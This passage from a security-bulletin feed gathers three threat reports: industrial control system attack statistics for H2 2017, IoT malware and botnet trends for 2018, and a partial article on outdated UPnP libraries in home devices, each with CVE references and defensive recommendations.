 * Wiper type programs (KillDisk) designed to delete (wipe) data on the hard drive and render the computer unusable

Malware infections of computers on an industrial network can result in the loss of control or the disruption of industrial processes.

### Platforms used by malware

In the second half of 2017, we saw a significant increase in the percentage of ICS computers affected by malware written for the JavaScript platform.

_Platforms used by malware, percentage of ICS computers attacked, H2 2017 vs H1 2017_

The main reason for the growing figures for the JavaScript platform is the increase in the number of phishing emails that include a loader for Trojan-Ransom.Win32.Locky.

In the latest versions of such emails, the attackers used a fax-received notification template.

The phishing emails include an attachment – an obfuscated loader written in JavaScript and designed to download and execute the main malicious module from servers controlled by the attackers.

It is important to note that threat actors often attack legitimate websites in order to host malware components on these sites. Threat actors do this to hide malicious traffic behind legitimate domains and mask the traces of an attack.

Cryptocurrency miners also made a small contribution to the increase in the share of the JavaScript platform – both the versions for browsers and the script-based loaders of miners for the Windows platform.

### Geographical distribution of attacks on industrial automation systems

The map below shows the percentages of industrial automation systems attacked to the total number of such systems in each country.

_Geographical distribution of attacks on industrial automation systems, H2 2017. Percentage of attacked ICS computers in each country_

TOP 15 countries by percentage of ICS computers attacked:

| | **Country\*** | **% of systems attacked** |
|---|---|---|
| 1 | Vietnam | 69.6 |
| 2 | Algeria | 66.2 |
| 3 | Morocco | 60.4 |
| 4 | Indonesia | 60.1 |
| 5 | China | 59.5 |
| 6 | Egypt | 57.6 |
| 7 | Peru | 55.2 |
| 8 | Iran | 53.0 |
| 9 | India | 52.4 |
| 10 | Kazakhstan | 50.1 |
| 11 | Saudi Arabia | 48.4 |
| 12 | Mexico | 47.5 |
| 13 | Russia | 46.8 |
| 14 | Malaysia | 46.7 |
| 15 | Turkey | 44.1 |

\*_Countries in which the number of ICS computers monitored by
Kaspersky Lab ICS CERT was insufficient to obtain representative data sets were excluded from the ranking._\n\nThe Top 5 has remained unchanged since H1 2017.\n\nThe least affected countries in this ranking are Israel (8.6%), Denmark (13.6%), the UK (14.5%), the Netherlands (14.5%), Sweden (14.8%) and Kuwait (15.3%).\n\nEgypt has moved from ninth place to sixth \u2013 the percentage of attacked ICS machines in that country grew by 6.1 p.p. This is the most significant growth among all countries of the world. Internet threats accounted for most of the growth in the percentage of attacked ICS computers in Egypt. Among the internet threats detected, the most common were sites infected with script-based cryptocurrency miners and attempts to download malware by following URL links.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130636/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-21.png>)\n\n_Main sources of threats blocked on ICS computers in Egypt \npercentage of ICS computers attacked, H2 2017 vs H1 2017_\n\nMalware distributed via removable media is also a real problem for many ICS in Egypt. 
Malware loaders distributed on removable media are disguised as existing user files on the removable drive, increasing the chances of a successful attack.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130643/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-22.png>)\n\n_Examples of names used for loaders of malware distributed via removable media that were blocked on ICS computers in Egypt in H2 2017_\n\nIn most cases, the loaders that we detected were designed to launch the malware module responsible for infecting the system, including downloading the main module, infecting removable media and network shares and propagating via email/instant messengers to an existing list of contacts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130652/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-23.png>)\n\n_Malicious code for the AutoIt platform, launched by a malicious .lnk loader \nblocked on an ICS computer in Egypt in H2 2017_\n\nIn Russia during H2 2017, 46.8% of ICS computers were attacked at least once \u2013 a 3.8 p.p. rise on H1 2017. This saw Russia move up from 21st to 13th.\n\nThe proportions of attacked ICS machines vary greatly between different regions of the world.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130701/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-24.png>)\n\n_Percentage of ICS systems attacked in regions of the world, H2 2017 vs H1 2017_\n\nAll regions can be assigned to one of three groups according to the percentage of attacked ICS machines:\n\n 1. Proportion of attacked ICS systems below 30%. This group includes North America and Europe, where the situation looks the most peaceful. 
Kaspersky Lab ICS CERT specialists say this does not necessarily mean that industrial enterprises in these regions are less frequently attacked by cybercriminals; rather, it could be that more attention is paid to ensuring information security at industrial enterprises in these regions, which results in fewer attacks reaching ICS.\n 2. Proportion of attacked ICS systems between 30% and 50%. This group includes Latin America, Russia and the Middle East.\n 3. Proportion of attacked ICS systems above 50%. The situation is most acute in Africa and the Asia-Pacific region.\n\nIt should be noted that values may differ significantly between countries within the same region. This may be due to different practices and approaches to ICS information security in those countries.\n\nIn particular, the Asia-Pacific region includes Vietnam with the highest global proportion of attacked ICS systems (69.6%) alongside countries such as Japan (25%), Australia (24.1%) and Singapore (23.2%), where figures did not exceed 25%.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130707/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-25.png>)\n\n_Percentage of attacked ICS computers in Asia-Pacific countries, H2 2017 vs H1 2017_\n\nIn Europe, Denmark's score (13.6%) was not only the lowest in the region but also one of the lowest globally, while the proportions of attacked ICS systems in Belarus (41%), Portugal (42.5%) and Ukraine (41.4%) were all above 40%.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130713/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-26.png>)\n\n_Percentage of attacked ICS computers in Europe, H2 2017 vs H1 2017_\n\nLet's now look at the sources of attacks that affected ICS systems in different 
regions.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130719/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-27.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130725/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-28.png>)\n\n_Main sources of threats blocked on ICS computers in different regions, H2 2017_\n\nIn all regions of the world, the internet remains the main source of attacks. However, in Europe and North America, the percentage of blocked web-borne attacks is substantially lower than elsewhere. This may be because most enterprises operating in those regions adhere to information security standards. In particular, internet access is restricted on systems that are part of industrial networks. The situation is similar for infected removable devices: the highest numbers are seen in Africa and the Asia-Pacific region, while the lowest are in Europe and North America. These figures also reflect the level of compliance with information security standards and, in particular, whether restrictions are in place to prevent the connection of unauthorized removable media to industrial infrastructure systems.\n\nCuriously, in spite of the relatively high overall percentage of attacks that reached ICS systems, the percentages of ICS computers attacked via removable media and email clients in Russia were relatively small \u2013 4.4% and 1.4% respectively. One possible explanation is that risks associated with these attack vectors are largely mitigated through organizational measures, as well as removable media and email handling practices established at industrial enterprises. 
This interpretation is reassuring, since removable media and email are often used as penetration vectors in sophisticated targeted and APT attacks.\n\nFor countries of the Middle East, email was a significant (5%) source of infection, with the region leading the ranking based on this parameter.\n\n## Our recommendations\n\nTo prevent accidental infections in industrial networks, we recommend taking a set of measures designed to secure the internal and external perimeters of these networks.\n\nThis includes, first and foremost, measures required to provide secure remote access to automation systems and secure transfer of data between the industrial network and other networks that have different trust levels:\n\n * Systems that have full-time or regular connections to external networks (mobile devices, VPN concentrators, terminal servers, etc.) should be isolated into a separate segment of the industrial network \u2013 the demilitarized zone (DMZ);\n * Systems in the demilitarized zone should be divided into subnets or virtual subnets (VLAN), with restricted access between subnets (only the communications that are required should be allowed);\n * All the necessary communication between the industrial network and the outside world (including the enterprise's office network) should be performed via the DMZ;\n * If necessary, terminal servers that support reverse connection methods (from the industrial network to the DMZ) can be deployed in the DMZ;\n * Thin clients should be used whenever possible to access the industrial network from the outside (using reverse connection methods);\n * Access from the demilitarized zone to the industrial network should be blocked;\n * If the enterprise's business processes are compatible with one-way communication, we recommend that you consider using data diodes.\n\nThe threat landscape for industrial automation systems is continually changing, with new vulnerabilities regularly found both in application software and in industrial 
software. Based on the threat evolution trends identified in H2 2017, we recommend placing special emphasis on the following security measures:\n\n * Regularly updating the operating systems, application software and security solutions on systems that are part of the enterprise's industrial network;\n * Installing firmware updates on control devices used in industrial automation systems in a timely manner;\n * Restricting network traffic on ports and protocols used on the edge routers between the organization's network and those of other companies (if information is transferred from one company's industrial network to another company);\n * Paying close attention to account control and password policies. Users should have only those privileges that are required for them to perform their responsibilities. The number of user accounts with administrative privileges should be as limited as possible. Strong passwords (at least 9 characters, both upper and lower case, combined with digits and special characters) should be used, with regular password changing enforced by the domain policy, for example, every 90 days.\n\nTo provide protection from accidental infections with new, previously unknown malware and targeted attacks, we recommend doing the following on a regular basis:\n\n 1. Taking an inventory of running network services on all hosts of the industrial network; where possible, stopping vulnerable network services (unless this will jeopardize the continuity of industrial processes) and other services that are not directly required for the operation of the automation system; special emphasis should be placed on services that provide remote access to file system objects, such as SMB/CIFS and/or NFS (which is relevant in the case of attacks on systems running Linux).\n 2. Auditing ICS component access control; trying to achieve maximum access granularity.\n 3. Auditing the network activity in the enterprise's industrial network and at its boundaries. 
Eliminating any network connections with external and other adjacent information networks that are not required by industrial processes.\n 4. Verifying the security of remote access to the industrial network; placing a special emphasis on whether demilitarized zones are set up in compliance with IT security requirements. To the fullest extent possible, minimizing or completely eliminating the use of remote administration tools (such as RDP or TeamViewer). More details on this are provided above.\n 5. Ensuring that signature databases, heuristics and decision algorithms of endpoint security solutions are up-to-date. Checking that all the main protection components are enabled and running and that ICS software folders, OS system folders or user profiles are not excluded from the scope of protection. Application startup control technologies configured in whitelisting mode and application behavior analysis technologies are particularly effective for industrial enterprises. Application startup control will prevent cryptomalware from running even if it finds its way onto the computer, while application behavior analysis technologies are helpful for detecting and blocking attempts to exploit vulnerabilities (including unknown ones) in legitimate software.\n 6. Auditing policies and practices related to using removable media and portable devices. Blocking devices that provide illegitimate access to external networks and the Internet from being connected to industrial network hosts. Wherever possible, disabling the relevant ports or controlling access to these ports using properly configured dedicated tools.\n\nIn addition, to provide protection from targeted attacks directed at the enterprise's industrial network and its main industrial assets, we recommend deploying tools that provide network traffic monitoring and detection of cyberattacks on industrial networks. 
In most cases, such measures do not require any changes to ICS components or their configuration and can be carried out without suspending their operation.\n\nOf course, completely isolating the industrial network from adjacent networks is virtually impossible, since transferring data between networks is required to perform a variety of important functions \u2013 controlling and maintaining remote facilities, coordinating sophisticated industrial processes, parts of which are distributed between numerous workshops, lines, plants and support systems. We hope, however, that our recommendations will help you provide maximum protection for your industrial networks and automation systems against existing and future threats.\n\n_**Kaspersky Lab Industrial Control Systems Cyber Emergency Response Team (Kaspersky Lab ICS CERT)** is a global project of Kaspersky Lab aimed at coordinating the work of industrial automation system vendors, owners and operators of industrial facilities and IT security researchers in addressing issues associated with protecting industrial enterprises and critical infrastructure facilities._\n\n[ **Read the full \"Threat Landscape for Industrial Automation Systems in H2 2017\" report (English, PDF)**](<https://ics-cert.kaspersky.com/media/KL_ICS_REPORT_H2-2017_FINAL_EN_22032018.pdf>)", "modified": "2018-03-26T10:00:27", "published": "2018-03-26T10:00:27", "id": "SECURELIST:D257E8B7FC070ED8409973F0F9A689E6", "href": "https://securelist.com/threat-landscape-for-industrial-automation-systems-in-h2-2017/85053/", "type": "securelist", "title": "Threat Landscape for Industrial Automation Systems in H2 2017", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-28T10:13:53", "bulletinFamily": "blog", "cvelist": ["CVE-2014-8361", "CVE-2017-12113", "CVE-2017-7240", "CVE-2018-1000049", "CVE-2018-10088", "CVE-2018-10561", "CVE-2018-10562", "CVE-2018-7445"], "description": 
"\n\nCybercriminals' interest in IoT devices continues to grow: in H1 2018 we picked up three times as many malware samples attacking smart devices as in the whole of 2017. And in 2017 there were ten times more than in 2016. That doesn't bode well for the years ahead.\n\nWe decided to study what attack vectors are deployed by cybercriminals to infect smart devices, what malware is loaded into the system, and what it means for device owners and victims of freshly armed botnets.\n\n_Number of malware samples for IoT devices in Kaspersky Lab's collection, 2016-2018._ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/09/17153718/en-iot-malware-collection.png>)\n\nOne of the most popular attack and infection vectors against devices remains cracking Telnet passwords. In Q2 2018, there were three times as many such attacks against our [honeypots](<https://encyclopedia.kaspersky.com/glossary/honeypot-glossary/>) as all other types combined.\n\n**Service** | **% of attacks** \n---|--- \n**Telnet** | 75.40% \n**SSH** | 11.59% \n**other** | 13.01% \n \nWhen it came to downloading malware onto IoT devices, cybercriminals' preferred option was one of the [Mirai](<https://securelist.com/is-mirai-really-as-black-as-its-being-painted/76954/>) family (20.9%).\n\n**#** | **Downloaded malware** | **% of attacks** \n---|---|--- \n**1** | Backdoor.Linux.Mirai.c | 15.97% \n**2** | Trojan-Downloader.Linux.Hajime.a | 5.89% \n**3** | Trojan-Downloader.Linux.NyaDrop.b | 3.34% \n**4** | Backdoor.Linux.Mirai.b | 2.72% \n**5** | Backdoor.Linux.Mirai.ba | 1.94% \n**6** | Trojan-Downloader.Shell.Agent.p | 0.38% \n**7** | Trojan-Downloader.Shell.Agent.as | 0.27% \n**8** | Backdoor.Linux.Mirai.n | 0.27% \n**9** | Backdoor.Linux.Gafgyt.ba | 0.24% \n**10** | Backdoor.Linux.Gafgyt.af | 0.20% \n \n_Top 10 malware downloaded onto infected IoT devices following a successful Telnet password crack_\n\nAnd here are the Top 10 countries from which our traps were hit by 
Telnet password attacks:\n\n_Geographical distribution of the number of infected devices, Q2 2018._ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/09/17153651/en-map-infected-devices-q2-2018.png>)\n\nAs we see, in Q2 2018 the leader by number of unique IP addresses from which Telnet password attacks originated was Brazil (23%). Second place went to China (17%). Russia in our list took 4th place (7%). Overall for the period January 1 \u2013 July 2018, our Telnet honeypot registered more than 12 million attacks from 86,560 unique IP addresses, and malware was downloaded from 27,693 unique IP addresses.\n\nSince some smart device owners change the default Telnet password to one that is more complex, and many gadgets don't support this protocol at all, cybercriminals are constantly on the lookout for new ways of infection. This is stimulated by the high competition between virus writers, which has led to password bruteforce attacks becoming less effective: in the event of a successful crack, the device password is changed and access to Telnet is blocked.\n\nAn example of the use of \"alternative technology\" is the Reaper botnet, whose assets at end-2017 numbered about 2 million IoT devices. 
Instead of bruteforcing Telnet passwords, this botnet exploited known software vulnerabilities:\n\n * [Vulnerabilities in D-Link 850L router firmware](<https://blogs.securiteam.com/index.php/archives/3364>)\n * [Vulnerabilities in GoAhead IP cameras](<https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html>)\n * [Vulnerabilities in MVPower CCTV cameras](<https://www.pentestpartners.com/security-blog/pwning-cctv-cameras/>)\n * [Vulnerability in Netgear ReadyNAS Surveillance](<https://blogs.securiteam.com/index.php/archives/3409>)\n * [Vulnerability in Vacron NVR](<https://blogs.securiteam.com/index.php/archives/3445>)\n * [Vulnerability in Netgear DGN devices](<http://seclists.org/bugtraq/2013/Jun/8>)\n * [Vulnerabilities in Linksys E1500/E2500 routers](<http://www.s3cur1ty.de/m1adv2013-004>)\n * [Vulnerabilities in D-Link DIR-600 and DIR 300 - HW rev B1 routers](<http://www.s3cur1ty.de/m1adv2013-003>)\n * Vulnerabilities in AVTech devices\n\nAdvantages of this distribution method over password cracking:\n\n * Infection occurs much faster\n * It is much harder to patch a software vulnerability than change a password or disable/block the service\n\nAlthough this method is more difficult to implement, it found favor with many virus writers, and it wasn't long before new Trojans exploiting known vulnerabilities in smart device software started appearing.\n\n## New attacks, old malware\n\nTo see which vulnerabilities are targeted by malware, we analyzed data on attempts to connect to various ports on our traps. 
This is the picture that emerged for Q2 2018:\n\n**Service** | **Port** | **% of attacks** | **Attack vector** | **Malware families** \n---|---|---|---|--- \n**Telnet** | 23, 2323 | 82.26% | Bruteforce | Mirai, Gafgyt \n**SSH** | 22 | 11.51% | Bruteforce | Mirai, Gafgyt \n**Samba** | 445 | 2.78% | EternalBlue, EternalRed, CVE-2018-7445 | - \n**tr-069** | 7547 | 0.77% | [RCE in TR-069 implementation](<https://isc.sans.edu/forums/diary/TR069+NewNTPServer+Exploits+What+we+know+so+far/21763/>) | Mirai, Hajime \n**HTTP** | 80 | 0.76% | Attempts to exploit vulnerabilities in a web server or crack an admin console password | - \n**winbox (RouterOS)** | 8291 | 0.71% | [Used for RouterOS (MikroTik) authentication](<https://xakep.ru/2018/03/29/hajime-hunts-mikrotik/>) and [WinBox-based attacks](<https://threatpost.ru/mikrotik-patched-zero-day-vulnerability-in-record-time/25811/>) | Hajime \n**Mikrotik http** | 8080 | 0.23% | RCE in MikroTik RouterOS < 6.38.5 [Chimay-Red](<https://github.com/BigNerd95/Chimay-Red>) | Hajime \n**MSSQL** | 1433 | 0.21% | Execution of arbitrary code for certain versions (2000, 2005, 2008); changing administrator password; data theft | - \n**GoAhead httpd** | 81 | 0.16% | [RCE in GoAhead IP cameras](<http://blog.netlab.360.com/a-new-threat-an-iot-botnet-scanning-internet-on-port-81-en/>) | Persirai, Gafgyt \n**Mikrotik http** | 8081 | 0.15% | [Chimay-Red](<https://github.com/BigNerd95/Chimay-Red>) | Hajime \n**Ethereum JSON-RPC** | 8545 | 0.15% | [Authorization bypass (CVE-2017-12113)](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0465>) | - \n**RDP** | 3389 | 0.12% | Bruteforce | - \n**XionMai uc-httpd** | 8000 | 0.09% | [Buffer overflow (CVE-2018-10088) in XionMai uc-httpd 1.0.0 (some Chinese-made devices)](<https://www.bleepingcomputer.com/news/security/all-that-port-8000-traffic-this-week-yeah-thats-satori-looking-for-new-bots/>) | Satori \n**MySQL** | 3306 | 0.08% | Execution of arbitrary code for certain versions (2000, 
2005, 2008); changing administrator password; data theft | - \n \nThe vast majority of attacks still come from Telnet and SSH password bruteforcing. The third most common are attacks against the SMB service, which provides remote access to files. We haven't seen IoT malware attacking this service yet. However, some versions of it contain serious known vulnerabilities such as EternalBlue (Windows) and EternalRed (Linux), which were used, for instance, to distribute the infamous Trojan ransomware [WannaCry](<https://securelist.com/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/78351/>) and the Monero cryptocurrency miner [EternalMiner](<https://securelist.com/sambacry-is-coming/78674/>).\n\nHere's the breakdown of possibly infected IoT devices that replied on the IPs that attacked our honeypots in Q2 2018:\n\n**Device** | **% of infected devices** \n---|--- \n**MikroTik** | 37.23% \n**TP-Link** | 9.07% \n**SonicWall** | 3.74% \n**AV tech** | 3.17% \n**Vigor** | 3.15% \n**Ubiquiti** | 2.80% \n**D-Link** | 2.49% \n**Cisco** | 1.40% \n**AirTies** | 1.25% \n**Cyberoam** | 1.13% \n**HikVision** | 1.11% \n**ZTE** | 0.88% \n**Unspecified device** | 0.68% \n**Unknown DVR** | 31.91% \n \nAs can be seen, MikroTik devices running under RouterOS are way out in front. The reason appears to be the Chimay-Red vulnerability. ~~What's interesting is that our honeypot attackers included 33 Miele dishwashers (0.68% of the total number of attacks). Most likely they were infected through the known (since March 2017) [CVE-2017-7240](<https://nvd.nist.gov/vuln/detail/CVE-2017-7240>) vulnerability in PST10 WebServer, which is used in their firmware.~~1\n\n### Port 7547\n\nAttacks against remote device management ([TR-069](<https://en.wikipedia.org/wiki/TR-069>) specification) on port 7547 are highly common. According to Shodan, there are more than 40 million devices in the world with this port open. 
And that's despite the vulnerability recently causing the infection of a million Deutsche Telekom routers, not to mention helping to spread the Mirai and Hajime malware families.\n\nAnother type of attack exploits the [Chimay-Red vulnerability](<https://wikileaks.org/ciav7p1/cms/page_16384604.html>) in MikroTik routers running under RouterOS versions below 6.38.4. In March 2018, it played an active part in distributing Hajime.\n\n### IP cameras\n\nIP cameras are also on the cybercriminal radar. In March 2017, several major vulnerabilities were detected in the software of GoAhead devices, and a month after information about it was published, there appeared new versions of the Gafgyt and Persirai Trojans exploiting these vulnerabilities. Just one week after these malicious programs were actively distributed, the number of infected devices climbed to 57,000.\n\nOn June 8, 2018, a [proof-of-concept](<https://encyclopedia.kaspersky.com/glossary/poc-proof-of-concept/>) was published for the CVE-2018-10088 vulnerability in the XionMai uc-httpd web server, used in some Chinese-made smart devices (for example, KKMoon DVRs). The next day, the number of logged attempts to locate devices using this web server more than tripled. The culprit for this spike in activity was the Satori Trojan, known for previously attacking [GPON routers](<http://blog.netlab.360.com/gpon-exploit-in-the-wild-ii-satori-botnet-en/>).\n\n## New malware and threats to end users\n\n### DDoS attacks\n\nAs before, the primary purpose of IoT malware deployment is to perpetrate DDoS attacks. Infected smart devices become part of a botnet that attacks a specific address on command, depriving the host of the ability to correctly handle requests from real users. Such attacks are still deployed by Trojans from the Mirai family and its clones, in particular, Hajime.\n\nThis is perhaps the least harmful scenario for the end user. 
The worst (and very unlikely) thing that can happen to the owner of the infected device is being blocked by their ISP. And the device can often be \"cured\" with a simple reboot.\n\n### Cryptocurrency mining\n\nAnother type of payload is linked to cryptocurrencies. For instance, IoT malware can install a miner on an infected device. But given the low processing power of smart devices, the feasibility of such attacks remains in doubt, even despite their potentially large number.\n\nA more devious and doable method of getting a couple of cryptocoins was invented by the creators of the Satori Trojan. Here, the victim IoT device acts as a kind of key that opens access to a high-performance PC:\n\n * At the first stage, the attackers try to infect as many routers as possible using known vulnerabilities, in particular: \n * [CVE-2014-8361](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8361>) \u2013 RCE in the miniigd SOAP service in Realtek SDK\n * [CVE-2017-17215](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE%202017-17215>) \u2013 RCE in the firmware of Huawei HG532 routers\n * [CVE-2018-10561](<https://nvd.nist.gov/vuln/detail/CVE-2018-10561>), [CVE-2018-10562](<https://nvd.nist.gov/vuln/detail/CVE-2018-10562>) \u2013 authorization bypass and execution of arbitrary commands on Dasan GPON routers\n * [CVE-2018-10088](<https://nvd.nist.gov/vuln/detail/CVE-2018-10088>) \u2013 buffer overflow in XiongMai uc-httpd 1.0.0 used in the firmware of some routers and other smart devices made by some Chinese manufacturers\n * Using compromised routers and the [CVE-2018-1000049](<https://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Execution/>) vulnerability in the [Claymore](<https://www.dualminer.ru/>) Ethereum miner remote management tool, they replace the miner's wallet address with their own.\n\n### Data theft\n\nThe [VPNFilter](<https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/>) Trojan, detected in May 2018, pursues other 
goals, above all intercepting infected device traffic, extracting important data from it (user names, passwords, etc.), and sending it to the cybercriminals' server. Here are the main features of VPNFilter:\n\n * Modular architecture. The malware creators can fit it out with new functions on the fly. For instance, in early June 2018 a new module was detected able to inject javascript code into intercepted web pages.\n * Reboot resistant. The Trojan writes itself to the standard Linux crontab job scheduler, and can also modify the configuration settings in the non-volatile memory (NVRAM) of the device.\n * Uses TOR for communication with C&C.\n * Able to self-destruct and disable the device. On receiving the command, the Trojan deletes itself, overwrites the critical part of the firmware with garbage data, and then reboots the device.\n\nThe Trojan's distribution method is still unknown: its code contains no self-propagation mechanisms. However, we are inclined to believe that it exploits known vulnerabilities in device software for infection purposes.\n\nThe very [first VPNFilter report](<https://blog.talosintelligence.com/2018/05/VPNFilter.html>) spoke of around 500,000 infected devices. Since then, even more have appeared, and the list of manufacturers of vulnerable gadgets has expanded considerably. As of mid-June, it included the following brands:\n\n * ASUS\n * D-Link\n * Huawei\n * Linksys\n * MikroTik\n * Netgear\n * QNAP\n * TP-Link\n * Ubiquiti\n * Upvel\n * ZTE\n\nThe situation is made worse by the fact that these manufacturers' devices are used not only in corporate networks, but often as home routers.\n\n### Conclusion\n\nSmart devices are on the rise, with [some forecasts](<https://www.statista.com/statistics/764026/number-of-iot-devices-in-use-worldwide/>) suggesting that by 2020 their number will exceed the world's population several times over. 
Yet manufacturers still don't prioritize security: there are no reminders to change the default password during initial setup or notifications about the release of new firmware versions, and the updating process itself can be complex for the average user. This makes IoT devices a prime target for cybercriminals. Easier to infect than PCs, they often play an important role in the home infrastructure: some manage Internet traffic, others shoot video footage, still others control domestic devices (for example, air conditioning).\n\nMalware for smart devices is increasing not only in quantity, but also quality. More and more exploits are being weaponized by cybercriminals, and infected devices are used to steal personal data and mine cryptocurrencies, on top of traditional DDoS attacks.\n\nHere are some simple tips to help minimize the risk of smart device infection:\n\n * Don't give access to the device from an external network unless absolutely necessary\n * Periodic rebooting will help get rid of malware already installed (although in most cases the risk of reinfection will remain)\n * Regularly check for new firmware versions and update the device\n * Use complex passwords at least 8 characters long, including upper and lower-case letters, numerals, and special characters\n * Change the factory passwords at initial setup (even if the device does not prompt you to do so)\n * Close/block unused ports, if there is such an option. For example, if you don't connect to the router via Telnet (port TCP:23), it's a good idea to disable it so as to close off a potential loophole to intruders.\n\n \n\n* * *\n\n1 \u2014 The previous version of the text incorrectly stated that Kaspersky Lab honeypots, used for detecting botnets, were attacked by 33 Miele dishwashers.\n\nA Miele representative shared new details with us so we could review our earlier findings. 
We understand that connection attempts were performed by other objects from the networks that presented the targeted IP addresses, including, but not limited to, a router or another device within the network.

We would like to thank the company for bringing this to our attention and being able to clarify our findings. We apologize for any confusion caused.

Published 2018-09-18T10:00:36 Modified 2018-09-18T10:00:36
ID SECURELIST:2F75371B5752C888430A598DF749FD1A Type securelist Title "New trends in the world of IoT threats" URL https://securelist.com/new-trends-in-the-world-of-iot-threats/87991/ CVSS 10.0 (AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/)

* * *

Type myhack58 Last seen 2019-03-28T22:38:03 Bulletin family info CVE list CVE-2013-0229, CVE-2013-0230, CVE-2007-1204, CVE-2017-1000494, CVE-2012-5958, CVE-2014-8361

Earlier this year, users of Chromecast streaming dongles, Google Home devices and smart TVs were forcibly shown a message promoting the YouTube channel PewDiePie. The hijack is said to have been the work of fans in the subscriber battle between top YouTube channels. Reportedly, the attackers exploited improperly configured routers with the Universal Plug and Play (UPnP) service enabled, which exposed ports of private devices on the public Internet.

Many devices, such as cameras, printers and routers, use the UPnP protocol so that they can automatically discover other devices on the local network and communicate with them to share data or stream media. The convenience comes with security risks, such as attacker-controlled devices bypassing firewall protection, to name just one.
In the wake of this event, we investigated UPnP-related events in home networks and found that many users' devices still use the UPnP protocol.

Table 1. UPnP enabled, by major device type

In January this year, we detected that 76% of routers had UPnP enabled, as did 27% of media devices such as DVD players and media streaming devices. Once a UPnP vulnerability is exploited by an attacker, a router or other device can easily become a proxy, and then a node of a botnet and a source of distributed denial of service ([DDoS](<http://www.myhack58.com/Article/60/sort096/Article_096_1.htm>)) attacks or spam campaigns, while making the malicious activity almost impossible to trace. There have been such cases before, in which router UPnP vulnerabilities were used to force the device to connect to ports and send spam or other malicious messages.

The IoT botnet Satori became infamous for exploiting a UPnP vulnerability, CVE-2014-8361, a command injection vulnerability in the miniigd UPnP SOAP interface of the Realtek SDK. An advisory and mitigations for this vulnerability were published in May 2015, but according to the latest data we collected, many devices still run older, possibly vulnerable UPnP versions.

Figure 1. Shodan results for UPnP detection, data as of March 5, 2019

The online search engine Shodan shows the number and distribution of devices worldwide that use the UPnP protocol. Scanning on the standard UPnP port 1900, we retrieved 1,649,719 devices. The table below lists some well-known UPnP libraries; MiniUPnPd and Custom (Broadcom UPnP library) are the ones most used by the devices found.

Table 2. The top three UPnP libraries in the Shodan results, data as of March 5, 2019

### UPnP-related vulnerabilities and the state of home network devices

Using our own scanning tool, we studied the UPnP libraries used in home and other small-scale network environments, and identified the factors that could leave a device vulnerable. In short, we found that most devices still use older versions of UPnP libraries, in which many vulnerabilities have been public for years.

### MiniUPnPd

Data from our IoT scanning tool shows that 16% of UPnP-enabled devices use the MiniUPnPd library. MiniUPnPd is a well-known UPnP daemon that provides port mapping protocol services on NAT (Network Address Translation) routers. Interestingly, we detected devices with older MiniUPnPd versions installed: 24% were using MiniUPnPd 1.0, 30% MiniUPnPd 1.6, and only 5% of devices used MiniUPnPd 2.x (miniupnpd 2.1 is the latest version).

Table 3. Share of each MiniUPnPd version in use

Devices running older versions of the daemon must be updated to eliminate some known high-risk vulnerabilities. For example, CVE-2013-0230 is a stack-based buffer overflow in ExecuteSoapAction in MiniUPnPd 1.0 that allows an attacker to execute arbitrary code; CVE-2013-0229 is a vulnerability in the ProcessSSDPRequest function in MiniUPnPd before 1.4 that allows an attacker to trigger a buffer over-read with a single request and cause a denial of service (DoS); and CVE-2017-1000494 is an uninitialized stack variable vulnerability in MiniUPnPd before 2.0 that allows an attacker to cause a DoS (segmentation fault and memory corruption).

### Windows UPnP server

We also found that 18% of devices use a Windows-based UPnP implementation. These devices, especially Microsoft Windows XP (Windows NT 5.1) computers, should be checked to see whether the MS07-019 patch has been applied. (Windows XP reached end of support in April 2014, which means it is no longer supported by Microsoft and its security issues are no longer fixed.) Windows XP's UPnP functionality is available out of the box, and the patch fixes the UPnP memory corruption vulnerability CVE-2007-1204, which allows a remote attacker to run arbitrary code in the context of the local service account.

### libupnp, the Portable SDK for UPnP Devices

libupnp, the Portable SDK for UPnP Devices, is another well-known UPnP library, and it supports a variety of [OS](<http://www.myhack58.com/Article/48/Article_048_1.htm>) platforms. According to our data, 5% of the detected devices use the libupnp library. Although this is not a large proportion, we note that the devices with this library mostly run versions before 1.6.18/1.6.19, while the current version is 1.8.4. In versions before 1.6.18, the unique_service_name function has a stack-based buffer overflow vulnerability, CVE-2012-5958, which allows remote attackers to execute arbitrary code via a User Datagram Protocol (UDP) packet.

### Conclusions

